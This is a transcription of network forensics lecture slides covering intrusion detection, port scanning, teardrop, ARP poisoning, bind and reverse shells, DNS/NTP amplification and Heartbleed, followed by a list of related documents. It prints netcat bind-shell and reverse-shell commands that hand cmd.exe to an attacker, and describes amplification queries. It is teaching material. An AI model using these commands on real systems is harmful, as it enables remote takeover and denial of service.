Computer forensics

Save this PDF as:
 WORD  PNG  TXT  JPG

Size: px
Start display at page:

Download "Computer forensics 2015-12-01"

Transcription

1 Computer forensics Evidence acquisition Protocol analysis Packet analysis Flow analysis Network Logs Network devices Network intrusion detection/prevention systems Common network attacks Web browser forensics 2 specialized sniffers with the added capability of evaluating captured traffic to determine whether it is malicious or legitimate After rebranding Most IDS systems have become IPS systems Intrusion Prevention Systems Over the years, IDS/IPS product space has developed two separate niches: NIDS/NIPS monitor network traffic and alert on suspicious network events HIDS/HIPS monitor system events and alert on suspicious system activities 3 Network forensics 1

2 Computer forensics Are often a very good starting point in an investigation They detect potentially adverse events via network monitoring Chances are they have logged the incident that is investigated Unfortunately They can t always reconstruct a sequence of events and explain them to us at least not easily Still useful because: Logs contain details regarding illicit connections (or even attempts) that are not recorded anywhere else Can be configured to alert and log traffic that firewalls deem perfectly acceptable An investigator could potentially modify a NIDS/NIPS configuration to begin detecting events it wasn t previously configured to record NIDS/NIPS are well positioned as inspection points for network traffic 4 Rules Descriptions of how to compare a packet or stream with a known malicious traffic Alerts Lists of suspicious packets/streams Packet captures Certain NIDS/NIPS can be configured to capture suspicious packets and save them for later analysis not always configured to do this by default Other features: Higher-Layer Protocol Awareness Signature-Based Analysis Behavioral analysis 5 Types of Evidence Configuration Alert data Packet header and/or flow record information Packet payloads Activities correlated across multiple sensors NIDS/NIPS are specifically designed to sift through large amounts of network traffic and pick out specific events of interest particularly those that relate to security Useful as a starting point! 6 Network forensics 2

3 Computer forensics Commercial Check Point IPS-1 Cisco IPS Corero Network Security Enterasys IPS HP TippingPoint IPS IBM Security NIPS Sourcefire 3D System Open source Snort Bro Network Security Monitor 7 NIPS and NIDS open source Martin Roesch, 1998 free subscriptions for rules, three modes sniffer traffic logger NIDS detects probes or attacks: operating system fingerprinting attempts, common gateway interface, buffer overflows, server message block probes, stealth port scans, 8 Evidence acquisition Protocol analysis Packet analysis Flow analysis Network Logs Network devices Network intrusion detection/prevention systems Common network attacks Web browser forensics 9 Network forensics 3

4 Computer forensics 1. Reconnaissance Browse various information sources for knowledge about the target system search engines, social networks, WHOIS databases or DNS 2. Enumeration (or scanning) systematically identifying systems and collecting information finding vulnerabilities (openings) in the target organization, such as: WiFi access points, lnternet gateways, available systems, vulnerable services 3. Exploitation actively exploit a security weaknesses in order to gain access to a system, cause denial-of-service, etc. 4. Post exploitation Once access to a system is obtained, an attacker can use this system: as a foothold for other attacks gather sensitive information (e.g. Passwords, certificates..) from the compromised system in order to compromise another one Usual steps of an attack 10 Scans SYN stealth scan Idle (zombie) scan FIN, Null, Xmas tree scans TCP connect() scan UDPs scan IP protocol scan Ping scan Attacks Teardrop ARP poisoning Password guessing Bind shell Reverse shell DoS attacks NTP DNS Heartbleed Important because: extremely often used in the enumeration phase of an attack Usually the only way of identifying and enumerating open services on a target network device There are various types of port scans have different impact on the target system and can be observed in different ways good attackers are known to delete logs and other useful traces of an exploit Analyzing network logs for port scans can be helpful in identifying the attack source because it usually occurs prior to an exploit (days, weeks or more..) it is possible that an attacker forgets (or can t) delete such traces 12 Network forensics 4

5 Computer forensics Most famous tool: Nmap Capable of conducting various types of port scans and other identification techniques often used by attackers: OS identification, service identification, checking for known vulnerabilities» limited but sometimes useful Zenmap A GUI interface for nmap no additional features except for GUI Our focus is on identifying the various port scanning methods Leverage the 3 way TCP handshake 1. 1 Client sends SYNchronize to an TCP open port that has a service bound to it Example: HTTClient P (port 80), SMTP (25), POP3 (110) or SSH (22) 2. 2 Serverside will respond with SYN ACK I ACKnowledge your SYN and I want to SYNchronize also 3. 3 Client will answer to the SYN ACK with an ACK Client Server 15 Network forensics 5

6 Computer forensics just initiates and closes (RST) connection Attacker Target SYN SYN, ACK RST 16 The job of a firewall is to protect a system from unwanted packets that could harm the system e.g. an attacker is conducting a port scan against port 81 there is no service running on this port, so using a firewall to block access to it is the best practice A filtered port result from Nmap indicates that the port has not responded at all the SYN packet has simply been dropped by the firewall 17 closed ports most commonly indicate that there is no service running on the port BUT the firewall has allowed the connection to go through to the server It can also mean there is no firewall present, at all 18 Network forensics 6

7 Computer forensics This is what attackers are looking for when using port scans An open service (port) could be a publicly accessible service that is by its nature supposed to be accessible but, it could also be a back-end service that does not need to be publicly accessible and therefore should be blocked by a firewall 19 SYN Stealth Scan Is the example explained in the previous slide Explained in more detail in the following slides: TCP connect() Scan FIN, Null and Xmas Tree Scans Ping Scan IP Protocol Scans UDP scans Idle scan (or zombie scan) advanced, highly stealthed technique, where no packets are sent to the target identifying attacker s machine directly rather third (innocent) computer is involved» by sending packets to the target» forged to look like they came from third computer More information here: 20 These scans are called connect() scans because UNIX sockets programming uses a system call named connect() to begin a TCP connection to a remote site If connect() succeeds a connection was made If it fails the connection could not be made» due to remote system is offline, port is closed, or some other error occurred along the way... Very effective - provides a clear picture of the ports you can and cannot access If a connect() scan lists a port as open, you can definitely connect to it because, that is what the scanning computer just did! Major drawback to this kind of scan the scan is very easy to be detected on the system being scanned firewall or intrusion detection system will log all connect() attempts to every port on the system (and will almost always trigger a warning!) For this reason, the SYN Stealth Scan was developed 21 Network forensics 7

8 Computer forensics Many of modern firewalls and IDS detect SYN scans, but: 1. The FIN scan sends a packet with only the FINal flag set 2. The Xmas Tree scan sets the FIN, URGand PUSH flags 3. The Null scan sends a packet with no flags switched on Because: closedport will respond with RST on all these scans open port will ignore them waiting SYN first But Windows, does not follow RFC 793 and ignores these packets even on closed ports so, if you also run SYN Stealth you can tell this is a Windows system Send 0-byte UDP packets to each target port Receipt of an ICMP Port Unreachable message signifies the port is closed, otherwise it is assumed open A major problem with this technique when a firewall blocks outgoing ICMP Port Unreachable messages, the port will appear open These false-positives are hard to distinguish from real open ports. Another disadvantage with UDP scanning is the speed at which it can be performed Most operating systems limit the number of ICMP Port Unreachable messages which can be generated in a certain time period, thus slowing the speed of an UDP scan 24 Network forensics 8

9 Computer forensics attempt to determine which IP protocols target supports sends a raw IP packet without additional protocol header to each port on the target machine Receipt of an ICMP Protocol Unreachable message tells us that the port is not in use, otherwise it is assumed open Not all hosts send ICMP Protocol Unreachable messages These may include firewalls, AIX, HP-UX and Digital UNIX These machines will report all protocols open! This scan type also falls victim to the ICMP limited rate, the same way as the UDP scans however, since only 256 protocols are possible 8-bit field for IP protocol in the IP header it should not take too long 25 lists the hosts within the specified range that responded to a ping It allows an attacker to detect which computers are online, rather than which ports are open Methods commonly used for ping sweeping: Sending an ICMP ECHO REQUEST (ping request) packet to the destination system If an ICMP ECHO REPLY is received, the system is up, and ICMP packets are not blocked. TCP Ping sends either a SYN or an ACK packet to any port (80 is the default) on the remote system If RST, or a SYN/ACK, is returned, then the remote system is online If the remote system does not respond, either it is offline, or the chosen port is filtered,» and thus not responding to anything 26 Scans SYN stealth scan Idle (zombie) scan FIN, Null, Xmas tree scans TCP connect() scan UDPs scan IP protocol scan Ping scan Attacks Teardrop ARP poisoning Password guessing Bind shell Reverse shell DoS attacks NTP DNS Heartbleed Network forensics 9

10 Computer forensics A teardrop attack is a denial of service (DoS) attack Conducted by targeting TCP/IP fragmentation reassembly codes This attack causes fragmented packets to overlap one another on the target host the host attempts to reconstruct them during the process but fails Gigantic payloads are sent to the machine that is being targeted, causing system crashes 28 One of the fields in an IP header is the fragment offset field It indicates the starting position (offset) of the data contained in a fragmented packet relative to the data in the original packet If the sum of the offset and size of one fragmented packet differsfrom that of the next fragmented packet, the packets overlap When this happens, a servervulnerable to teardrop attacks is unable to reassemble the packets resulting in a denial-of-service condition Network forensics 10

11 Computer forensics Works by sending unsolicited ARP messages that contain the IP address of a network resource such as the default gateway, or a DNS server and replaces the real MAC address of the network resource with its own (attacker s) MAC address Network devices (by design) use new information and overwrite any existing ARP data for that IP address As the consequence, all packets sent to legitimate system will be instead delivered to the attacker The attacker then takes the role of the man in the middle Any traffic destined for the legitimate resource is sent through the attacking system As this attack occurs on the lower levels of the OSI model, the end-user is oblivious to the attack occurrence Online password guessing Often used method of gaining access to a victim system/account It is a very loud way of trying to gain access a lot of network traffic is generated it is easy to spot in network traces a lot of authentication requests being» answered with an error» sent in a small time frame (e.g. 5 seconds) 33 Network forensics 11

12 Computer forensics 34 How does an attacker gain access to a vulnerable system? What happens when an attacker exploits a vulnerability? No easy (or unique answer) but for the most part, an attacker whishes to gain remote code execution ability This way they can run ANY command on the victim system and do anything with that computer This is accomplished by exploiting some vulnerability which allows remote code execution AND instructing the victim to start a shell with which an attacker can issue more commands without having to exploit the same vulnerability again Shell types: Bind shell Reverse shell 35 bind an application(e.g. /bin/bash) to a TCP/UDP port any machine that connects to this port will be presented with the application that was bind-ed with the same privileges of the user that bind-ed the application A bind shell simply opens up a port on the victim and binds the desired application Example: nc-lvvp1234 -e cmd.exe will connect cmd.exe to port 1234 from attacking machine nc IP_addr-of_victim Network forensics 12

13 Computer forensics gaining access to a remote computer and privilege to execute commands 37 With a classical bind shell The attacker needs to connect to the shell Which means the victim needs to open this port Not a problem this is done with the exploit However if there is a firewall protecting the victim it will most likely block any incoming traffic, and thus block the attacker s attempt to connect even though the exploit was successfully triggered! 38 Instead of using a bind shell And forcing a victim to open his port, and then try to connect to it An attacker can instruct the victim to start the connection and connect to the attacker thus bypassing a firewall since usually firewallsare configured to pass connections which are initiated from within the protected area on target computer attacker forces command nc IP_attackers 1234 e cmd.exe attacker on his computer executes nc -l Network forensics 13

14 Computer forensics 40 DoS are an attempt to make a machine or network unavailableto its intended users They present one of the most significant threats to assurance of dependable and secure information systems Very limited defense mechanisms One of the most often used attacks Requires only a lot of bandwidth but, no need for infrastructure or knowledge Can be bought easily via underground markets DDoS Distributed DoS many (third party) computers attack the victim very difficult to defend or counteract 41 Flood attacks Using Amplification attacks NTP DNS Protocol vulnerability exploitations attacks Malformed packet attacks e.g. Teardrop explained earlier 42 Network forensics 14

15 Computer forensics A type of reflection attack Reflection attacks involve eliciting a response from a legitimate (third party) server to a spoofed IP address (victim s) The attacker sends a packet to a legitimate, third party server with a forged IP address (the victim s) the server replies to victim s address similar to mail ordering to the address of your victim NTP amplification an attacker repeatedly sends the get monlist request to an NTP server, while spoofing the requesting server s IP address to that of the victim server The NTP server responds by sending the list to the spoofed IP address This response is much larger than the request, thus amplifying the amount of traffic directed at the target server and ultimately leading to a degradation of service for legitimate requests There are two criteria for a good amplification attack vector: query can be set with a spoofed source address via a protocol like ICMP or UDP that does not require a handshake the response to the query is significantly larger than the query itself DNS is a core, ubiquitous Internet service that meets these criteria and therefore has become the largest source of amplification attacks DNS queries are typically transmitted over UDP as a result, their source attribute can be spoofed and the receiver has no way of determining its veracity before responding DNS is capable of generating a much larger response than query 45 Network forensics 15

16 Computer forensics For example: the following (tiny - 64 byte ) query: dig ANY where x.x.x.xis the IP of an open DNS resolver will result in a response that is about bytes long a 64 byte query resultedin a byte response In other words, an attacker is able to achieve a 50x amplification over whatever traffic they can initiate to an open DNS resolver requests can be sent not only to one DNS server but rather to many a vulnerability in the popular OpenSSL cryptographic software library it enables an attacker to steal the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet SSL/TLS provides communication security and privacy over the Internet for applications such as: web, , instant messaging (IM) and some virtual private networks (VPNs) The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software This, in turn, can compromise the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content which, in turn, allows attackers to eavesdropon communications, steal data directly from the services and users and to impersonateservices and users 48 Network forensics 16

17 Computer forensics How does heartbleed work? It exploits a bug in the SSL heartbeat protocol The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation the heartbeat keeps the context between the peers alive hence the keep-alive nomenclature How it works? a heartbeat message is sent with some provisional data the peer simply copies this data and sends it back 49 An attacker can control the heartbeat size and structure it to be larger than expected for example: send 1byte, but claim you are sending 64k Send it to the target server using TCP on port 443 and receive a response that contains up to 64kb data one byte will be yours, but the rest to 64k will be memory content in a memory allocation outside the bounds of what the heartbeat should be able to access Do it again with a different heartbeat size, get another 64kb response from another memory space etc.. Over time, the attacker can reassemble the whole victim s memory 64kb at a time and gain access to sensitive information: passwords, private keys etc...» basically anything in the memory 50 struct { HeartbeatMessageType type; uint16 payload_length; opaque payload[heartbeatmessage.pay load_length]; opaque padding[padding_length]; } HeartbeatMessage; 51 Network forensics 17

18 Computer forensics A (lengthy) explanation and PoC code can be found at: A forensic investigator, needs to notice the following: Most exploits will send a heartbeat message which in hexadecimal representation looks like this: This is the hexadecimal representation for the HeartbeatMessage struct on the previous slide it is present in most heartbeat attacks 52 Evidence acquisition Protocol analysis Packet analysis Flow analysis Network Logs Network devices Network intrusion detection/prevention systems Common network attacks Web browser forensics 53 Searching for evidence left by Web browsing activity is typically a crucial component of digital forensic investigations Almost every activity a user performs while using a Web browser leaves a trace on the computer even searching for information using a Web browser Therefore, when an investigator analyzes a computer this evidence can provide useful information cache, history, cookies, download list useful because contains evidence for Web sites visited, has time and frequency of access, contains search engine keywords used 54 Network forensics 18

19 Computer forensics Each web browser has its own location Internet Explorer Versions 4 to 9 use the Internet Explorer History File Format (or MSIE 4-9 Cache File format) The Cache Files commonly named index.dat are used to store both cache and historical information Version 10 C:\Users\%USER%\AppData\Local\Microsoft\Windows\WebCache\ The WebCacheV01.dat and WebCacheV24.dat files are in the Extensible Storage Engine (ESE) Database File (EDB) format Firefox stores the history of visited sites in a file named places.sqlite Usually at: C:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefox\Profiles\%PROFILE%.default an SQLite file, easily browsable using the tool SQLiteBrowser This was merely a short overview of some attacks and vulnerabilities Each day this list grows The examples in this course are meant to provide you with the tools and knowledge necessary to handle new challenges on your own 57 Network forensics 19

20 Computer forensics Network forensics 20

CS5008: Internet Computing

CS5008: Internet Computing CS5008: Internet Computing Lecture 22: Internet Security A. O Riordan, 2009, latest revision 2015 Internet Security When a computer connects to the Internet and begins communicating with others, it is

More information

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap. Port Scanning Objectives 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap. Introduction: All machines connected to a LAN or connected to Internet via a modem

More information

Chapter 8 Security Pt 2

Chapter 8 Security Pt 2 Chapter 8 Security Pt 2 IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross,

More information

Presented By: Holes in the Fence. Agenda. IPCCTV Attack. DDos Attack. Why Network Security is Important

Presented By: Holes in the Fence. Agenda. IPCCTV Attack. DDos Attack. Why Network Security is Important Presented By: Holes in the Fence Dave Engebretson, Contributing Technology writer, SDM Magazine Industry Instructor in Fiber and Networking Prevention of Security System breaches of networked Edge Devices

More information

20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7

20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7 20-CS-6053-00X Network Security Spring, 2014 An Introduction To Network Security Week 1 January 7 Attacks Criminal: fraud, scams, destruction; IP, ID, brand theft Privacy: surveillance, databases, traffic

More information

Session Hijacking Exploiting TCP, UDP and HTTP Sessions

Session Hijacking Exploiting TCP, UDP and HTTP Sessions Session Hijacking Exploiting TCP, UDP and HTTP Sessions Shray Kapoor shray.kapoor@gmail.com Preface With the emerging fields in e-commerce, financial and identity information are at a higher risk of being

More information

Attack and Defense Techniques

Attack and Defense Techniques Network Security Attack and Defense Techniques Anna Sperotto, Ramin Sadre Design and Analysis of Communication Networks (DACS) University of Twente The Netherlands Attack Taxonomy Many different kind of

More information

Acquia Cloud Edge Protect Powered by CloudFlare

Acquia Cloud Edge Protect Powered by CloudFlare Acquia Cloud Edge Protect Powered by CloudFlare Denial-of-service (DoS) Attacks Are on the Rise and Have Evolved into Complex and Overwhelming Security Challenges TECHNICAL GUIDE TABLE OF CONTENTS Introduction....

More information

Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst

Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst INTEGRATED INTELLIGENCE CENTER Technical White Paper William F. Pelgrin, CIS President and CEO Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst This Center for Internet Security

More information

CloudFlare advanced DDoS protection

CloudFlare advanced DDoS protection CloudFlare advanced DDoS protection Denial-of-service (DoS) attacks are on the rise and have evolved into complex and overwhelming security challenges. 1 888 99 FLARE enterprise@cloudflare.com www.cloudflare.com

More information

A Very Incomplete Diagram of Network Attacks

A Very Incomplete Diagram of Network Attacks A Very Incomplete Diagram of Network Attacks TCP/IP Stack Reconnaissance Spoofing Tamper DoS Internet Transport Application HTTP SMTP DNS TCP UDP IP ICMP Network/Link 1) HTML/JS files 2)Banner Grabbing

More information

Linux Network Security

Linux Network Security Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols

More information

Dos & DDoS Attack Signatures (note supplied by Steve Tonkovich of CAPTUS NETWORKS)

Dos & DDoS Attack Signatures (note supplied by Steve Tonkovich of CAPTUS NETWORKS) Dos & DDoS Attack Signatures (note supplied by Steve Tonkovich of CAPTUS NETWORKS) Signature based IDS systems use these fingerprints to verify that an attack is taking place. The problem with this method

More information

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks

More information

CS 356 Lecture 16 Denial of Service. Spring 2013

CS 356 Lecture 16 Denial of Service. Spring 2013 CS 356 Lecture 16 Denial of Service Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists Chapter

More information

1. Introduction. 2. DoS/DDoS. MilsVPN DoS/DDoS and ISP. 2.1 What is DoS/DDoS? 2.2 What is SYN Flooding?

1. Introduction. 2. DoS/DDoS. MilsVPN DoS/DDoS and ISP. 2.1 What is DoS/DDoS? 2.2 What is SYN Flooding? Page 1 of 5 1. Introduction The present document explains about common attack scenarios to computer networks and describes with some examples the following features of the MilsGates: Protection against

More information

Security Technology White Paper

Security Technology White Paper Security Technology White Paper Issue 01 Date 2012-10-30 HUAWEI TECHNOLOGIES CO., LTD. 2012. All rights reserved. No part of this document may be reproduced or transmitted in any form or by any means without

More information

Abstract. Introduction. Section I. What is Denial of Service Attack?

Abstract. Introduction. Section I. What is Denial of Service Attack? Abstract In this report, I am describing the main types of DoS attacks and their effect on computer and network environment. This report will form the basis of my forthcoming report which will discuss

More information

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology Port Scanning and Vulnerability Assessment ECE4893 Internetwork Security Georgia Institute of Technology Agenda Reconnaissance Scanning Network Mapping OS detection Vulnerability assessment Reconnaissance

More information

CIT 380: Securing Computer Systems

CIT 380: Securing Computer Systems CIT 380: Securing Computer Systems Scanning CIT 380: Securing Computer Systems Slide #1 Topics 1. Port Scanning 2. Stealth Scanning 3. Version Identification 4. OS Fingerprinting 5. Vulnerability Scanning

More information

General Network Security

General Network Security 4 CHAPTER FOUR General Network Security Objectives This chapter covers the following Cisco-specific objectives for the Identify security threats to a network and describe general methods to mitigate those

More information

Introduction of Intrusion Detection Systems

Introduction of Intrusion Detection Systems Introduction of Intrusion Detection Systems Why IDS? Inspects all inbound and outbound network activity and identifies a network or system attack from someone attempting to compromise a system. Detection:

More information

A1.1.1.11.1.1.2 1.1.1.3S B

A1.1.1.11.1.1.2 1.1.1.3S B CS Computer 640: Network AdityaAkella Lecture Introduction Networks Security 25 to Security DoS Firewalls and The D-DoS Vulnerabilities Road Ahead Security Attacks Protocol IP ICMP Routing TCP Security

More information

CSCE 465 Computer & Network Security

CSCE 465 Computer & Network Security CSCE 465 Computer & Network Security Instructor: Dr. Guofei Gu http://courses.cse.tamu.edu/guofei/csce465/ Vulnerability Analysis 1 Roadmap Why vulnerability analysis? Example: TCP/IP related vulnerabilities

More information

Overview. Securing TCP/IP. Introduction to TCP/IP (cont d) Introduction to TCP/IP

Overview. Securing TCP/IP. Introduction to TCP/IP (cont d) Introduction to TCP/IP Overview Securing TCP/IP Chapter 6 TCP/IP Open Systems Interconnection Model Anatomy of a Packet Internet Protocol Security (IPSec) Web Security (HTTP over TLS, Secure-HTTP) Lecturer: Pei-yih Ting 1 2

More information

Firewalls, Tunnels, and Network Intrusion Detection

Firewalls, Tunnels, and Network Intrusion Detection Firewalls, Tunnels, and Network Intrusion Detection 1 Part 1: Firewall as a Technique to create a virtual security wall separating your organization from the wild west of the public internet 2 1 Firewalls

More information

Firewalls, Tunnels, and Network Intrusion Detection. Firewalls

Firewalls, Tunnels, and Network Intrusion Detection. Firewalls Firewalls, Tunnels, and Network Intrusion Detection 1 Firewalls A firewall is an integrated collection of security measures designed to prevent unauthorized electronic access to a networked computer system.

More information

Denial Of Service. Types of attacks

Denial Of Service. Types of attacks Denial Of Service The goal of a denial of service attack is to deny legitimate users access to a particular resource. An incident is considered an attack if a malicious user intentionally disrupts service

More information

Attack Lab: Attacks on TCP/IP Protocols

Attack Lab: Attacks on TCP/IP Protocols Laboratory for Computer Security Education 1 Attack Lab: Attacks on TCP/IP Protocols Copyright c 2006-2010 Wenliang Du, Syracuse University. The development of this document is funded by the National Science

More information

Seminar Computer Security

Seminar Computer Security Seminar Computer Security DoS/DDoS attacks and botnets Hannes Korte Overview Introduction What is a Denial of Service attack? The distributed version The attacker's motivation Basics Bots and botnets Example

More information

Security: Attack and Defense

Security: Attack and Defense Security: Attack and Defense Aaron Hertz Carnegie Mellon University Outline! Breaking into hosts! DOS Attacks! Firewalls and other tools 15-441 Computer Networks Spring 2003 Breaking Into Hosts! Guessing

More information

Attack and Defense Techniques

Attack and Defense Techniques Network Security Attack and Defense Techniques Anna Sperotto (with material from Ramin Sadre) Design and Analysis of Communication Networks (DACS) University of Twente The Netherlands Attacks! Many different

More information

Outline. CSc 466/566. Computer Security. 18 : Network Security Introduction. Network Topology. Network Topology. Christian Collberg

Outline. CSc 466/566. Computer Security. 18 : Network Security Introduction. Network Topology. Network Topology. Christian Collberg Outline Network Topology CSc 466/566 Computer Security 18 : Network Security Introduction Version: 2012/05/03 13:59:29 Department of Computer Science University of Arizona collberg@gmail.com Copyright

More information

IxLoad-Attack: Network Security Testing

IxLoad-Attack: Network Security Testing IxLoad-Attack: Network Security Testing IxLoad-Attack tests network security appliances determining that they effectively and accurately block attacks while delivering high end-user quality of experience

More information

1. Firewall Configuration

1. Firewall Configuration 1. Firewall Configuration A firewall is a method of implementing common as well as user defined security policies in an effort to keep intruders out. Firewalls work by analyzing and filtering out IP packets

More information

CS2107 Introduction to Information and System Security (Slid. (Slide set 8)

CS2107 Introduction to Information and System Security (Slid. (Slide set 8) Networks, the Internet Tool support CS2107 Introduction to Information and System Security (Slide set 8) National University of Singapore School of Computing July, 2015 CS2107 Introduction to Information

More information

CSCI 4250/6250 Fall 2015 Computer and Networks Security

CSCI 4250/6250 Fall 2015 Computer and Networks Security CSCI 4250/6250 Fall 2015 Computer and Networks Security Network Security Goodrich, Chapter 5-6 Tunnels } The contents of TCP packets are not normally encrypted, so if someone is eavesdropping on a TCP

More information

Availability Digest. www.availabilitydigest.com. @availabilitydig. Surviving DNS DDoS Attacks November 2013

Availability Digest. www.availabilitydigest.com. @availabilitydig. Surviving DNS DDoS Attacks November 2013 the Availability Digest @availabilitydig Surviving DNS DDoS Attacks November 2013 DDoS attacks are on the rise. A DDoS attack launches a massive amount of traffic to a website to overwhelm it to the point

More information

Network Security CS 192

Network Security CS 192 Network Security CS 192 Network Scanning (Idlescan) Department of Computer Science George Washington University Jonathan Stanton 1 Today s topics Discussion of new DNS flaws Network Scanning (Idlescan)

More information

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped

More information

Denial of Service Attacks

Denial of Service Attacks 2 Denial of Service Attacks : IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 August 2013 its335y13s2l06, Steve/Courses/2013/s2/its335/lectures/malicious.tex,

More information

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network

More information

Brocade NetIron Denial of Service Prevention

Brocade NetIron Denial of Service Prevention White Paper Brocade NetIron Denial of Service Prevention This white paper documents the best practices for Denial of Service Attack Prevention on Brocade NetIron platforms. Table of Contents Brocade NetIron

More information

co Characterizing and Tracing Packet Floods Using Cisco R

co Characterizing and Tracing Packet Floods Using Cisco R co Characterizing and Tracing Packet Floods Using Cisco R Table of Contents Characterizing and Tracing Packet Floods Using Cisco Routers...1 Introduction...1 Before You Begin...1 Conventions...1 Prerequisites...1

More information

FIREWALLS. Firewall: isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others

FIREWALLS. Firewall: isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others FIREWALLS FIREWALLS Firewall: isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others FIREWALLS: WHY Prevent denial of service attacks: SYN flooding: attacker

More information

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests

More information

Firewall Firewall August, 2003

Firewall Firewall August, 2003 Firewall August, 2003 1 Firewall and Access Control This product also serves as an Internet firewall, not only does it provide a natural firewall function (Network Address Translation, NAT), but it also

More information

Firewalls Netasq. Security Management by NETASQ

Firewalls Netasq. Security Management by NETASQ Firewalls Netasq Security Management by NETASQ 1. 0 M a n a g e m e n t o f t h e s e c u r i t y b y N E T A S Q 1 pyright NETASQ 2002 Security Management is handled by the ASQ, a Technology developed

More information

Project 4: (E)DoS Attacks

Project 4: (E)DoS Attacks Project4 EDoS Instructions 1 Project 4: (E)DoS Attacks Secure Systems and Applications 2009 Ben Smeets (C) Dept. of Electrical and Information Technology, Lund University, Sweden Introduction A particular

More information

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10)

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10) APNIC elearning: Network Security Fundamentals 20 March 2013 10:30 pm Brisbane Time (GMT+10) Introduction Presenter/s Nurul Islam Roman Senior Training Specialist nurul@apnic.net Specialties: Routing &

More information

Solution of Exercise Sheet 5

Solution of Exercise Sheet 5 Foundations of Cybersecurity (Winter 15/16) Prof. Dr. Michael Backes CISPA / Saarland University saarland university computer science Protocols = {????} Client Server IP Address =???? IP Address =????

More information

IDS 4.0 Roadshow. Module 1- IDS Technology Overview. 2003, Cisco Systems, Inc. All rights reserved. IDS Roadshow

IDS 4.0 Roadshow. Module 1- IDS Technology Overview. 2003, Cisco Systems, Inc. All rights reserved. IDS Roadshow IDS 4.0 Roadshow Module 1- IDS Technology Overview Agenda Network Security Network Security Policy Management Protocols The Security Wheel IDS Terminology IDS Technology HIDS and NIDS IDS Communication

More information

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:

More information

Development of a Network Intrusion Detection System

Development of a Network Intrusion Detection System Development of a Network Intrusion Detection System (I): Agent-based Design (FLC1) (ii): Detection Algorithm (FLC2) Supervisor: Dr. Korris Chung Please visit my personal homepage www.comp.polyu.edu.hk/~cskchung/fyp04-05/

More information

Safeguards Against Denial of Service Attacks for IP Phones

Safeguards Against Denial of Service Attacks for IP Phones W H I T E P A P E R Denial of Service (DoS) attacks on computers and infrastructure communications systems have been reported for a number of years, but the accelerated deployment of Voice over IP (VoIP)

More information

Chapter 28 Denial of Service (DoS) Attack Prevention

Chapter 28 Denial of Service (DoS) Attack Prevention Chapter 28 Denial of Service (DoS) Attack Prevention Introduction... 28-2 Overview of Denial of Service Attacks... 28-2 IP Options... 28-2 LAND Attack... 28-3 Ping of Death Attack... 28-4 Smurf Attack...

More information

Distributed Denial of Service(DDoS) Attack Techniques and Prevention on Cloud Environment

Distributed Denial of Service(DDoS) Attack Techniques and Prevention on Cloud Environment Distributed Denial of Service(DDoS) Attack Techniques and Prevention on Cloud Environment Keyur Chauhan 1,Vivek Prasad 2 1 Student, Institute of Technology, Nirma University (India) 2 Assistant Professor,

More information

Network Scanning. What is a Network scanner? Why are scanners needed? How do scanners do? Which scanner does the market provide?

Network Scanning. What is a Network scanner? Why are scanners needed? How do scanners do? Which scanner does the market provide? Network Scanning What is a Network scanner? Why are scanners needed? How do scanners do? Which scanner does the market provide? Where will our research go? Page : 1 Function - attacker view What hosts

More information

IntruPro TM IPS. Inline Intrusion Prevention. White Paper

